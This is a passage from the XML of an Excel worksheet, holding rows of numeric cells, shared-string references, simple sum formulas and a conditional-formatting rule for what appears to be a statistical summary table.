      </c>
      <c r="D32" s="281">
        <v>60</v>
      </c>
      <c r="E32" s="281">
        <v>151</v>
      </c>
      <c r="F32" s="281">
        <v>168</v>
      </c>
      <c r="G32" s="281">
        <v>319</v>
      </c>
      <c r="H32" s="281">
        <v>0</v>
      </c>
      <c r="I32" s="281">
        <v>40</v>
      </c>
      <c r="J32" s="454">
        <v>100</v>
      </c>
      <c r="K32" s="449">
        <v>15</v>
      </c>
      <c r="L32" s="454">
        <v>115</v>
      </c>
      <c r="M32" s="449">
        <v>4</v>
      </c>
      <c r="N32" s="454">
        <v>7</v>
      </c>
      <c r="S32" s="214"/>
    </row>
    <row r="33" spans="1:19">
      <c r="A33" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B33" s="364">
        <v>0.72729999999999995</v>
      </c>
      <c r="C33" s="364">
        <v>0.46360000000000001</v>
      </c>
      <c r="D33" s="364">
        <v>0.8</v>
      </c>
      <c r="E33" s="364">
        <v>0.94550000000000001</v>
      </c>
      <c r="F33" s="364">
        <v>1</v>
      </c>
      <c r="G33" s="364">
        <v>1</v>
      </c>
      <c r="H33" s="364">
        <v>9.1000000000000004E-3</v>
      </c>
      <c r="I33" s="364">
        <v>0.5091</v>
      </c>
      <c r="J33" s="456">
        <v>0.88180000000000003</v>
      </c>
      <c r="K33" s="613">
        <v>0.5757575757575758</v>
      </c>
      <c r="L33" s="456">
        <v>0.94848484848484849</v>
      </c>
      <c r="M33" s="364">
        <v>0.3</v>
      </c>
      <c r="N33" s="456">
        <v>0.66363636363636369</v>
      </c>
      <c r="S33" s="214"/>
    </row>
    <row r="34" spans="1:19">
      <c r="A34" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B34" s="281">
        <v>8632952</v>
      </c>
      <c r="C34" s="281">
        <v>4646033</v>
      </c>
      <c r="D34" s="281">
        <v>13278985</v>
      </c>
      <c r="E34" s="281">
        <v>12625181</v>
      </c>
      <c r="F34" s="281">
        <v>12768915</v>
      </c>
      <c r="G34" s="281">
        <v>25390971</v>
      </c>
      <c r="H34" s="281">
        <v>6422</v>
      </c>
      <c r="I34" s="281">
        <v>7134370</v>
      </c>
      <c r="J34" s="454">
        <v>20406946</v>
      </c>
      <c r="K34" s="314">
        <f>K35+K36</f>
        <v>5052634</v>
      </c>
      <c r="L34" s="314">
        <f t="shared" ref="L34" si="5">L35+L36</f>
        <v>24525764</v>
      </c>
      <c r="M34" s="449">
        <f t="shared" ref="M34" si="6">M35+M36</f>
        <v>20515</v>
      </c>
      <c r="N34" s="458">
        <f t="shared" ref="N34" si="7">N35+N36</f>
        <v>2511662</v>
      </c>
      <c r="O34" s="572"/>
      <c r="P34" s="572"/>
      <c r="Q34" s="572"/>
      <c r="S34" s="214"/>
    </row>
    <row r="35" spans="1:19">
      <c r="A35" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B35" s="281">
        <v>13523</v>
      </c>
      <c r="C35" s="281">
        <v>4968</v>
      </c>
      <c r="D35" s="281">
        <v>18491</v>
      </c>
      <c r="E35" s="281">
        <v>383176</v>
      </c>
      <c r="F35" s="281">
        <v>192858</v>
      </c>
      <c r="G35" s="281">
        <v>572909</v>
      </c>
      <c r="H35" s="281">
        <v>2</v>
      </c>
      <c r="I35" s="281">
        <v>8207</v>
      </c>
      <c r="J35" s="454">
        <v>26696</v>
      </c>
      <c r="K35" s="314">
        <v>655807</v>
      </c>
      <c r="L35" s="454">
        <v>1977311</v>
      </c>
      <c r="M35" s="311">
        <v>19923</v>
      </c>
      <c r="N35" s="458">
        <v>2508032</v>
      </c>
      <c r="O35" s="572"/>
      <c r="P35" s="572"/>
      <c r="Q35" s="572"/>
      <c r="S35" s="214"/>
    </row>
    <row r="36" spans="1:19">
      <c r="A36" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B36" s="281">
        <v>8619429</v>
      </c>
      <c r="C36" s="281">
        <v>4641065</v>
      </c>
      <c r="D36" s="281">
        <v>13260494</v>
      </c>
      <c r="E36" s="281">
        <v>12242005</v>
      </c>
      <c r="F36" s="281">
        <v>12576057</v>
      </c>
      <c r="G36" s="281">
        <v>24818062</v>
      </c>
      <c r="H36" s="281">
        <v>6420</v>
      </c>
      <c r="I36" s="281">
        <v>7126163</v>
      </c>
      <c r="J36" s="454">
        <v>20380250</v>
      </c>
      <c r="K36" s="314">
        <v>4396827</v>
      </c>
      <c r="L36" s="454">
        <v>22548453</v>
      </c>
      <c r="M36" s="281">
        <v>592</v>
      </c>
      <c r="N36" s="454">
        <v>3630</v>
      </c>
      <c r="O36" s="572"/>
      <c r="P36" s="572"/>
      <c r="Q36" s="572"/>
      <c r="S36" s="214"/>
    </row>
    <row r="37" spans="1:19" ht="13.5" thickBot="1">
      <c r="A37" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B37" s="283">
        <v>637.39029801079641</v>
      </c>
      <c r="C37" s="283">
        <v>934.19182769726251</v>
      </c>
      <c r="D37" s="283">
        <v>717.13233464928885</v>
      </c>
      <c r="E37" s="283">
        <v>31.948778107188343</v>
      </c>
      <c r="F37" s="283">
        <v>65.208894627134995</v>
      </c>
      <c r="G37" s="283">
        <v>43.319378819323838</v>
      </c>
      <c r="H37" s="283">
        <v>3210</v>
      </c>
      <c r="I37" s="283">
        <v>868.30303399536979</v>
      </c>
      <c r="J37" s="457">
        <v>763.41961342523223</v>
      </c>
      <c r="K37" s="459">
        <v>6.7249999999999996</v>
      </c>
      <c r="L37" s="457">
        <v>11.4734</v>
      </c>
      <c r="M37" s="459">
        <v>2.9600000000000001E-2</v>
      </c>
      <c r="N37" s="457">
        <v>8.0000000000000004E-4</v>
      </c>
      <c r="O37" s="572"/>
      <c r="P37" s="572"/>
      <c r="Q37" s="572"/>
      <c r="S37" s="214"/>
    </row>
    <row r="38" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A38" s="734" t="s">
        <v>4472</v>
      </c>
      <c r="B38" s="735"/>
      <c r="C38" s="735"/>
      <c r="D38" s="735"/>
      <c r="E38" s="735"/>
      <c r="F38" s="735"/>
      <c r="G38" s="735"/>
      <c r="H38" s="735"/>
      <c r="I38" s="735"/>
      <c r="J38" s="735"/>
      <c r="K38" s="735"/>
      <c r="L38" s="735"/>
      <c r="M38" s="735"/>
      <c r="N38" s="736"/>
      <c r="O38" s="572"/>
      <c r="P38" s="572"/>
      <c r="Q38" s="572"/>
      <c r="S38" s="214"/>
    </row>
    <row r="39" spans="1:19" ht="14.25" customHeight="1">
      <c r="A39" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B39" s="546">
        <v>0.26967994498529679</v>
      </c>
      <c r="C39" s="546">
        <v>0.65366101862718362</v>
      </c>
      <c r="D39" s="546">
        <v>0.66742381247191462</v>
      </c>
      <c r="E39" s="546">
        <v>0.75075719352954828</v>
      </c>
      <c r="F39" s="546">
        <v>0.7977240352174656</v>
      </c>
      <c r="G39" s="546">
        <v>0.86339709604245574</v>
      </c>
      <c r="H39" s="546">
        <v>0</v>
      </c>
      <c r="I39" s="546">
        <v>0.49543369430686229</v>
      </c>
      <c r="J39" s="547">
        <v>0.72613547446239479</v>
      </c>
      <c r="K39" s="548">
        <v>0.64666999999999997</v>
      </c>
      <c r="L39" s="549">
        <v>0.82020000000000004</v>
      </c>
      <c r="M39" s="550">
        <v>0.51345499999999999</v>
      </c>
      <c r="N39" s="549">
        <v>0.780443</v>
      </c>
      <c r="O39" s="214"/>
      <c r="S39" s="214"/>
    </row>
    <row r="40" spans="1:19" ht="36.75" customHeight="1">
      <c r="A40" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B40" s="260" t="s">
        <v>4567</v>
      </c>
      <c r="C40" s="260" t="s">
        <v>4568</v>
      </c>
      <c r="D40" s="260" t="s">
        <v>4569</v>
      </c>
      <c r="E40" s="260" t="s">
        <v>4570</v>
      </c>
      <c r="F40" s="260" t="s">
        <v>4571</v>
      </c>
      <c r="G40" s="260" t="s">
        <v>4572</v>
      </c>
      <c r="H40" s="260" t="s">
        <v>1786</v>
      </c>
      <c r="I40" s="260" t="s">
        <v>4313</v>
      </c>
      <c r="J40" s="312" t="s">
        <v>4573</v>
      </c>
      <c r="K40" s="436" t="s">
        <v>4832</v>
      </c>
      <c r="L40" s="437" t="s">
        <v>4835</v>
      </c>
      <c r="M40" s="315" t="s">
        <v>4833</v>
      </c>
      <c r="N40" s="437" t="s">
        <v>4836</v>
      </c>
      <c r="O40" s="262"/>
      <c r="S40" s="214"/>
    </row>
    <row r="41" spans="1:19" ht="25.5">
      <c r="A41" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B41" s="281">
        <v>22</v>
      </c>
      <c r="C41" s="281">
        <v>71</v>
      </c>
      <c r="D41" s="281">
        <v>93</v>
      </c>
      <c r="E41" s="281">
        <v>214</v>
      </c>
      <c r="F41" s="281">
        <v>229</v>
      </c>
      <c r="G41" s="281">
        <v>443</v>
      </c>
      <c r="H41" s="281">
        <v>2</v>
      </c>
      <c r="I41" s="281">
        <v>63</v>
      </c>
      <c r="J41" s="311">
        <v>154</v>
      </c>
      <c r="K41" s="451">
        <v>26</v>
      </c>
      <c r="L41" s="454">
        <v>160</v>
      </c>
      <c r="M41" s="449">
        <v>7</v>
      </c>
      <c r="N41" s="454">
        <v>16</v>
      </c>
      <c r="S41" s="214"/>
    </row>
    <row r="42" spans="1:19">
      <c r="A42" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B42" s="364">
        <v>7.2700000000000001E-2</v>
      </c>
      <c r="C42" s="364">
        <v>0.42730000000000001</v>
      </c>
      <c r="D42" s="364">
        <v>0.44550000000000001</v>
      </c>
      <c r="E42" s="364">
        <v>0.56359999999999999</v>
      </c>
      <c r="F42" s="364">
        <v>0.63639999999999997</v>
      </c>
      <c r="G42" s="364">
        <v>0.74550000000000005</v>
      </c>
      <c r="H42" s="364">
        <v>0</v>
      </c>
      <c r="I42" s="364">
        <v>0.2455</v>
      </c>
      <c r="J42" s="365">
        <v>0.52729999999999999</v>
      </c>
      <c r="K42" s="455" t="s">
        <v>4616</v>
      </c>
      <c r="L42" s="456" t="s">
        <v>4749</v>
      </c>
      <c r="M42" s="450" t="s">
        <v>4834</v>
      </c>
      <c r="N42" s="456" t="s">
        <v>4758</v>
      </c>
      <c r="S42" s="214"/>
    </row>
    <row r="43" spans="1:19">
      <c r="A43" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B43" s="281">
        <v>85</v>
      </c>
      <c r="C43" s="281">
        <v>4919</v>
      </c>
      <c r="D43" s="281">
        <v>5004</v>
      </c>
      <c r="E43" s="281">
        <v>174555</v>
      </c>
      <c r="F43" s="281">
        <v>130328</v>
      </c>
      <c r="G43" s="281">
        <v>304816</v>
      </c>
      <c r="H43" s="281">
        <f>H44+H45</f>
        <v>0</v>
      </c>
      <c r="I43" s="281">
        <f>I44+I45</f>
        <v>7249</v>
      </c>
      <c r="J43" s="281">
        <f>J44+J45</f>
        <v>12253</v>
      </c>
      <c r="K43" s="653">
        <f>K44+K45</f>
        <v>612602</v>
      </c>
      <c r="L43" s="458">
        <f t="shared" ref="L43:N43" si="8">L44+L45</f>
        <v>681058</v>
      </c>
      <c r="M43" s="451">
        <f t="shared" si="8"/>
        <v>19915</v>
      </c>
      <c r="N43" s="458">
        <f t="shared" si="8"/>
        <v>2507881</v>
      </c>
      <c r="O43" s="572"/>
      <c r="P43" s="572"/>
      <c r="Q43" s="572"/>
      <c r="S43" s="214"/>
    </row>
    <row r="44" spans="1:19">
      <c r="A44" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B44" s="281">
        <v>85</v>
      </c>
      <c r="C44" s="281">
        <v>4919</v>
      </c>
      <c r="D44" s="281">
        <v>5004</v>
      </c>
      <c r="E44" s="281">
        <v>174555</v>
      </c>
      <c r="F44" s="281">
        <v>130328</v>
      </c>
      <c r="G44" s="281">
        <v>304816</v>
      </c>
      <c r="H44" s="281">
        <v>0</v>
      </c>
      <c r="I44" s="281">
        <v>7249</v>
      </c>
      <c r="J44" s="311">
        <v>12253</v>
      </c>
      <c r="K44" s="451">
        <v>612602</v>
      </c>
      <c r="L44" s="454">
        <v>681058</v>
      </c>
      <c r="M44" s="449">
        <v>19915</v>
      </c>
      <c r="N44" s="454">
        <v>2507881</v>
      </c>
      <c r="O44" s="572"/>
      <c r="P44" s="572"/>
      <c r="Q44" s="572"/>
      <c r="S44" s="214"/>
    </row>
    <row r="45" spans="1:19">
      <c r="A45" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B45" s="281">
        <v>0</v>
      </c>
      <c r="C45" s="281">
        <v>0</v>
      </c>
      <c r="D45" s="281">
        <v>0</v>
      </c>
      <c r="E45" s="281">
        <v>0</v>
      </c>
      <c r="F45" s="281">
        <v>0</v>
      </c>
      <c r="G45" s="281">
        <v>0</v>
      </c>
      <c r="H45" s="281">
        <v>0</v>
      </c>
      <c r="I45" s="281">
        <v>0</v>
      </c>
      <c r="J45" s="311">
        <v>0</v>
      </c>
      <c r="K45" s="451">
        <v>0</v>
      </c>
      <c r="L45" s="454">
        <v>0</v>
      </c>
      <c r="M45" s="449">
        <v>0</v>
      </c>
      <c r="N45" s="454">
        <v>0</v>
      </c>
      <c r="O45" s="572"/>
      <c r="P45" s="572"/>
      <c r="Q45" s="572"/>
      <c r="S45" s="214"/>
    </row>
    <row r="46" spans="1:19" ht="13.5" thickBot="1">
      <c r="A46" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B46" s="367">
        <v>0</v>
      </c>
      <c r="C46" s="367">
        <v>0</v>
      </c>
      <c r="D46" s="367">
        <v>0</v>
      </c>
      <c r="E46" s="367">
        <v>0</v>
      </c>
      <c r="F46" s="367">
        <v>0</v>
      </c>
      <c r="G46" s="367">
        <v>0</v>
      </c>
      <c r="H46" s="367">
        <v>0</v>
      </c>
      <c r="I46" s="367">
        <v>0</v>
      </c>
      <c r="J46" s="367">
        <v>0</v>
      </c>
      <c r="K46" s="368">
        <v>0</v>
      </c>
      <c r="L46" s="457">
        <v>0</v>
      </c>
      <c r="M46" s="459">
        <v>0</v>
      </c>
      <c r="N46" s="457">
        <v>0</v>
      </c>
      <c r="O46" s="572"/>
      <c r="P46" s="572"/>
      <c r="Q46" s="572"/>
      <c r="S46" s="214"/>
    </row>
    <row r="47" spans="1:19" ht="14.25" customHeight="1" thickTop="1" thickBot="1">
      <c r="A47" s="730" t="s">
        <v>4583</v>
      </c>
      <c r="B47" s="731"/>
      <c r="C47" s="731"/>
      <c r="D47" s="731"/>
      <c r="E47" s="731"/>
      <c r="F47" s="731"/>
      <c r="G47" s="731"/>
      <c r="H47" s="731"/>
      <c r="I47" s="731"/>
      <c r="J47" s="731"/>
      <c r="K47" s="731"/>
      <c r="L47" s="731"/>
      <c r="M47" s="731"/>
      <c r="N47" s="732"/>
      <c r="O47" s="572"/>
      <c r="P47" s="572"/>
      <c r="Q47" s="572"/>
      <c r="S47" s="214"/>
    </row>
    <row r="48" spans="1:19" ht="18.75" customHeight="1" thickTop="1">
      <c r="A48" s="261" t="s">
        <v>640</v>
      </c>
      <c r="B48" s="567">
        <v>0.834507</v>
      </c>
      <c r="C48" s="567">
        <v>0.67345500000000003</v>
      </c>
      <c r="D48" s="567">
        <v>0.87522200000000006</v>
      </c>
      <c r="E48" s="567">
        <v>0.95556799999999997</v>
      </c>
      <c r="F48" s="567">
        <v>0.98874899999999999</v>
      </c>
      <c r="G48" s="567">
        <v>0.98650000000000004</v>
      </c>
      <c r="H48" s="567">
        <v>9.5346E-2</v>
      </c>
      <c r="I48" s="567">
        <v>0.69719399999999998</v>
      </c>
      <c r="J48" s="568">
        <v>0.91877799999999998</v>
      </c>
      <c r="K48" s="551">
        <v>0.75065099999999996</v>
      </c>
      <c r="L48" s="552">
        <v>0.96629299999999996</v>
      </c>
      <c r="M48" s="553">
        <v>0.54772200000000004</v>
      </c>
      <c r="N48" s="552">
        <v>0.81462900000000005</v>
      </c>
      <c r="O48" s="733" t="s">
        <v>2351</v>
      </c>
      <c r="P48" s="733"/>
      <c r="Q48" s="733"/>
      <c r="S48" s="214"/>
    </row>
    <row r="49" spans="1:22" ht="34.5" customHeight="1">
      <c r="A49" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B49" s="260" t="s">
        <v>4574</v>
      </c>
      <c r="C49" s="260" t="s">
        <v>4575</v>
      </c>
      <c r="D49" s="260" t="s">
        <v>4576</v>
      </c>
      <c r="E49" s="260" t="s">
        <v>4577</v>
      </c>
      <c r="F49" s="260" t="s">
        <v>4578</v>
      </c>
      <c r="G49" s="260" t="s">
        <v>4579</v>
      </c>
      <c r="H49" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I49" s="260" t="s">
        <v>4580</v>
      </c>
      <c r="J49" s="312" t="s">
        <v>4581</v>
      </c>
      <c r="K49" s="436" t="s">
        <v>4762</v>
      </c>
      <c r="L49" s="437" t="s">
        <v>4830</v>
      </c>
      <c r="M49" s="315" t="s">
        <v>4763</v>
      </c>
      <c r="N49" s="437" t="s">
        <v>4831</v>
      </c>
      <c r="O49" s="262" t="s">
        <v>1766</v>
      </c>
      <c r="S49" s="214"/>
    </row>
    <row r="50" spans="1:22" ht="25.5">
      <c r="A50" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B50" s="281">
        <v>13</v>
      </c>
      <c r="C50" s="281">
        <v>66</v>
      </c>
      <c r="D50" s="281">
        <v>80</v>
      </c>
      <c r="E50" s="281">
        <v>183</v>
      </c>
      <c r="F50" s="281">
        <v>215</v>
      </c>
      <c r="G50" s="281">
        <v>409</v>
      </c>
      <c r="H50" s="281">
        <v>1</v>
      </c>
      <c r="I50" s="281">
        <v>51</v>
      </c>
      <c r="J50" s="311">
        <v>133</v>
      </c>
      <c r="K50" s="451">
        <v>21</v>
      </c>
      <c r="L50" s="454">
        <v>148</v>
      </c>
      <c r="M50" s="449">
        <v>5</v>
      </c>
      <c r="N50" s="454">
        <v>9</v>
      </c>
      <c r="S50" s="214"/>
    </row>
    <row r="51" spans="1:22">
      <c r="A51" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B51" s="364">
        <v>0.72729999999999995</v>
      </c>
      <c r="C51" s="364">
        <v>0.45450000000000002</v>
      </c>
      <c r="D51" s="364">
        <v>0.8</v>
      </c>
      <c r="E51" s="364">
        <v>0.94550000000000001</v>
      </c>
      <c r="F51" s="364">
        <v>1</v>
      </c>
      <c r="G51" s="364">
        <v>0.98180000000000001</v>
      </c>
      <c r="H51" s="364">
        <v>9.1000000000000004E-3</v>
      </c>
      <c r="I51" s="364">
        <v>0.5091</v>
      </c>
      <c r="J51" s="365">
        <v>0.88180000000000003</v>
      </c>
      <c r="K51" s="455" t="s">
        <v>4764</v>
      </c>
      <c r="L51" s="456" t="s">
        <v>4819</v>
      </c>
      <c r="M51" s="450" t="s">
        <v>4757</v>
      </c>
      <c r="N51" s="456" t="s">
        <v>4748</v>
      </c>
      <c r="S51" s="214"/>
    </row>
    <row r="52" spans="1:22">
      <c r="A52" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B52" s="281">
        <v>6066577</v>
      </c>
      <c r="C52" s="281">
        <v>346050</v>
      </c>
      <c r="D52" s="281">
        <v>6408844</v>
      </c>
      <c r="E52" s="281">
        <v>4867771</v>
      </c>
      <c r="F52" s="281">
        <v>2175097</v>
      </c>
      <c r="G52" s="281">
        <v>2748811</v>
      </c>
      <c r="H52" s="281">
        <v>24</v>
      </c>
      <c r="I52" s="281">
        <v>3588481</v>
      </c>
      <c r="J52" s="311">
        <v>6457670</v>
      </c>
      <c r="K52" s="653">
        <f>K53+K54</f>
        <v>677991</v>
      </c>
      <c r="L52" s="458">
        <f t="shared" ref="L52" si="9">L53+L54</f>
        <v>1176404</v>
      </c>
      <c r="M52" s="449">
        <f t="shared" ref="M52" si="10">M53+M54</f>
        <v>19990</v>
      </c>
      <c r="N52" s="458">
        <f t="shared" ref="N52" si="11">N53+N54</f>
        <v>2510463</v>
      </c>
      <c r="O52" s="572"/>
      <c r="P52" s="572"/>
      <c r="Q52" s="572"/>
      <c r="S52" s="214"/>
    </row>
    <row r="53" spans="1:22">
      <c r="A53" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B53" s="281">
        <v>13267</v>
      </c>
      <c r="C53" s="281">
        <v>4924</v>
      </c>
      <c r="D53" s="281">
        <v>18189</v>
      </c>
      <c r="E53" s="281">
        <v>381783</v>
      </c>
      <c r="F53" s="281">
        <v>191236</v>
      </c>
      <c r="G53" s="281">
        <v>308773</v>
      </c>
      <c r="H53" s="281">
        <v>1</v>
      </c>
      <c r="I53" s="281">
        <v>7371</v>
      </c>
      <c r="J53" s="311">
        <v>25535</v>
      </c>
      <c r="K53" s="451">
        <v>655768</v>
      </c>
      <c r="L53" s="454">
        <v>954387</v>
      </c>
      <c r="M53" s="449">
        <v>19922</v>
      </c>
      <c r="N53" s="454">
        <v>2508022</v>
      </c>
      <c r="O53" s="572"/>
      <c r="P53" s="572"/>
      <c r="Q53" s="572"/>
      <c r="S53" s="214"/>
    </row>
    <row r="54" spans="1:22">
      <c r="A54" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B54" s="281">
        <v>6053310</v>
      </c>
      <c r="C54" s="281">
        <v>341126</v>
      </c>
      <c r="D54" s="281">
        <v>6390655</v>
      </c>
      <c r="E54" s="281">
        <v>4485988</v>
      </c>
      <c r="F54" s="281">
        <v>1983861</v>
      </c>
      <c r="G54" s="281">
        <v>2440038</v>
      </c>
      <c r="H54" s="281">
        <v>23</v>
      </c>
      <c r="I54" s="281">
        <v>3581110</v>
      </c>
      <c r="J54" s="311">
        <v>6432135</v>
      </c>
      <c r="K54" s="451">
        <v>22223</v>
      </c>
      <c r="L54" s="454">
        <v>222017</v>
      </c>
      <c r="M54" s="449">
        <v>68</v>
      </c>
      <c r="N54" s="454">
        <v>2441</v>
      </c>
      <c r="O54" s="572"/>
      <c r="P54" s="572"/>
      <c r="Q54" s="572"/>
      <c r="S54" s="214"/>
    </row>
    <row r="55" spans="1:22" ht="13.5" thickBot="1">
      <c r="A55" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B55" s="283">
        <v>456.26818421647698</v>
      </c>
      <c r="C55" s="283">
        <v>69.278229082047119</v>
      </c>
      <c r="D55" s="283">
        <v>351.34724283907855</v>
      </c>
      <c r="E55" s="283">
        <v>11.750098878158536</v>
      </c>
      <c r="F55" s="283">
        <v>10.373888807546697</v>
      </c>
      <c r="G55" s="283">
        <v>7.9023684065640456</v>
      </c>
      <c r="H55" s="283">
        <v>23</v>
      </c>
      <c r="I55" s="283">
        <v>485.83774250440916</v>
      </c>
      <c r="J55" s="283">
        <v>251.89485020560016</v>
      </c>
      <c r="K55" s="368">
        <v>3.4700000000000002E-2</v>
      </c>
      <c r="L55" s="457">
        <v>0.31940000000000002</v>
      </c>
      <c r="M55" s="459">
        <v>3.3999999999999998E-3</v>
      </c>
      <c r="N55" s="457">
        <v>5.0000000000000001E-4</v>
      </c>
      <c r="O55" s="572"/>
      <c r="P55" s="572"/>
      <c r="Q55" s="572"/>
      <c r="S55" s="214"/>
    </row>
    <row r="56" spans="1:22" ht="13.5" thickTop="1">
      <c r="U56" s="26">
        <v>52</v>
      </c>
      <c r="V56" s="26">
        <v>0.98693699999999995</v>
      </c>
    </row>
    <row r="57" spans="1:22">
      <c r="U57" s="26">
        <v>53</v>
      </c>
      <c r="V57" s="26">
        <v>0.98695200000000005</v>
      </c>
    </row>
    <row r="58" spans="1:22">
      <c r="U58" s="26">
        <v>54</v>
      </c>
      <c r="V58" s="26">
        <v>0.98695299999999997</v>
      </c>
    </row>
    <row r="59" spans="1:22">
      <c r="U59" s="26">
        <v>55</v>
      </c>
      <c r="V59" s="26">
        <v>0.98695299999999997</v>
      </c>
    </row>
    <row r="60" spans="1:22">
      <c r="U60" s="26">
        <v>56</v>
      </c>
      <c r="V60" s="26">
        <v>0.98695500000000003</v>
      </c>
    </row>
    <row r="61" spans="1:22">
      <c r="U61" s="26">
        <v>57</v>
      </c>
      <c r="V61" s="26">
        <v>0.98695500000000003</v>
      </c>
    </row>
    <row r="62" spans="1:22">
      <c r="U62" s="26">
        <v>58</v>
      </c>
      <c r="V62" s="26">
        <v>0.98695900000000003</v>
      </c>
    </row>
    <row r="63" spans="1:22">
      <c r="U63" s="26">
        <v>59</v>
      </c>
      <c r="V63" s="26">
        <v>0.98695999999999995</v>
      </c>
    </row>
    <row r="64" spans="1:22">
      <c r="U64" s="26">
        <v>60</v>
      </c>
      <c r="V64" s="26">
        <v>0.98696099999999998</v>
      </c>
    </row>
    <row r="65" spans="21:22">
      <c r="U65" s="26">
        <v>61</v>
      </c>
      <c r="V65" s="26">
        <v>0.98696399999999995</v>
      </c>
    </row>
    <row r="66" spans="21:22">
      <c r="U66" s="26">
        <v>62</v>
      </c>
      <c r="V66" s="26">
        <v>0.98696499999999998</v>
      </c>
    </row>
    <row r="67" spans="21:22">
      <c r="U67" s="26">
        <v>63</v>
      </c>
      <c r="V67" s="26">
        <v>0.98696499999999998</v>
      </c>
    </row>
    <row r="68" spans="21:22">
      <c r="U68" s="26">
        <v>64</v>
      </c>
      <c r="V68" s="26">
        <v>0.98733700000000002</v>
      </c>
    </row>
    <row r="69" spans="21:22">
      <c r="U69" s="26">
        <v>65</v>
      </c>
      <c r="V69" s="26">
        <v>0.98736699999999999</v>
      </c>
    </row>
    <row r="70" spans="21:22">
      <c r="U70" s="26">
        <v>66</v>
      </c>
      <c r="V70" s="26">
        <v>0.98736699999999999</v>
      </c>
    </row>
    <row r="71" spans="21:22">
      <c r="U71" s="26">
        <v>67</v>
      </c>
      <c r="V71" s="26">
        <v>0.987371</v>
      </c>
    </row>
    <row r="72" spans="21:22">
      <c r="U72" s="26">
        <v>68</v>
      </c>
      <c r="V72" s="26">
        <v>0.98753500000000005</v>
      </c>
    </row>
    <row r="73" spans="21:22">
      <c r="U73" s="26">
        <v>69</v>
      </c>
      <c r="V73" s="26">
        <v>0.98753599999999997</v>
      </c>
    </row>
    <row r="74" spans="21:22">
      <c r="U74" s="26">
        <v>70</v>
      </c>
      <c r="V74" s="26">
        <v>0.98753599999999997</v>
      </c>
    </row>
    <row r="75" spans="21:22">
      <c r="U75" s="26">
        <v>71</v>
      </c>
      <c r="V75" s="26">
        <v>0.98753599999999997</v>
      </c>
    </row>
    <row r="76" spans="21:22">
      <c r="U76" s="26">
        <v>72</v>
      </c>
      <c r="V76" s="26">
        <v>0.98753599999999997</v>
      </c>
    </row>
    <row r="77" spans="21:22">
      <c r="U77" s="26">
        <v>73</v>
      </c>
      <c r="V77" s="26">
        <v>0.98754200000000003</v>
      </c>
    </row>
    <row r="78" spans="21:22">
      <c r="U78" s="26">
        <v>74</v>
      </c>
      <c r="V78" s="26">
        <v>0.98754200000000003</v>
      </c>
    </row>
    <row r="79" spans="21:22">
      <c r="U79" s="26">
        <v>75</v>
      </c>
      <c r="V79" s="26">
        <v>0.98754200000000003</v>
      </c>
    </row>
    <row r="80" spans="21:22">
      <c r="U80" s="26">
        <v>76</v>
      </c>
      <c r="V80" s="26">
        <v>0.98754200000000003</v>
      </c>
    </row>
    <row r="81" spans="21:22">
      <c r="U81" s="26">
        <v>77</v>
      </c>
      <c r="V81" s="26">
        <v>0.98754200000000003</v>
      </c>
    </row>
    <row r="82" spans="21:22">
      <c r="U82" s="26">
        <v>78</v>
      </c>
      <c r="V82" s="26">
        <v>0.98754200000000003</v>
      </c>
    </row>
    <row r="83" spans="21:22">
      <c r="U83" s="26">
        <v>79</v>
      </c>
      <c r="V83" s="26">
        <v>0.987958</v>
      </c>
    </row>
    <row r="84" spans="21:22">
      <c r="U84" s="26">
        <v>80</v>
      </c>
      <c r="V84" s="26">
        <v>0.98795900000000003</v>
      </c>
    </row>
    <row r="85" spans="21:22">
      <c r="U85" s="26">
        <v>81</v>
      </c>
      <c r="V85" s="26">
        <v>0.98797000000000001</v>
      </c>
    </row>
    <row r="86" spans="21:22">
      <c r="U86" s="26">
        <v>82</v>
      </c>
      <c r="V86" s="26">
        <v>0.98851699999999998</v>
      </c>
    </row>
    <row r="87" spans="21:22">
      <c r="U87" s="26">
        <v>83</v>
      </c>
      <c r="V87" s="26">
        <v>0.98851699999999998</v>
      </c>
    </row>
    <row r="88" spans="21:22">
      <c r="U88" s="26">
        <v>84</v>
      </c>
      <c r="V88" s="26">
        <v>0.98851699999999998</v>
      </c>
    </row>
    <row r="89" spans="21:22">
      <c r="U89" s="26">
        <v>85</v>
      </c>
      <c r="V89" s="26">
        <v>0.98851699999999998</v>
      </c>
    </row>
    <row r="90" spans="21:22">
      <c r="U90" s="26">
        <v>86</v>
      </c>
      <c r="V90" s="26">
        <v>0.98851800000000001</v>
      </c>
    </row>
    <row r="91" spans="21:22">
      <c r="U91" s="26">
        <v>87</v>
      </c>
      <c r="V91" s="26">
        <v>0.98851900000000004</v>
      </c>
    </row>
    <row r="92" spans="21:22">
      <c r="U92" s="26">
        <v>88</v>
      </c>
      <c r="V92" s="26">
        <v>0.98851999999999995</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="B2:J2"/>
    <mergeCell ref="K2:L2"/>
    <mergeCell ref="M2:N2"/>
    <mergeCell ref="A4:N4"/>
    <mergeCell ref="A47:N47"/>
    <mergeCell ref="O48:Q48"/>
    <mergeCell ref="A29:N29"/>
    <mergeCell ref="A11:N11"/>
    <mergeCell ref="A20:N20"/>
    <mergeCell ref="A38:N38"/>
  </mergeCells>
  <conditionalFormatting sqref="B51:F51 H51:J51 B52:J52 B53:N54">
    <cfRule type="expression" dxfId="445" priority="3">
      <formula>IF(B51&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
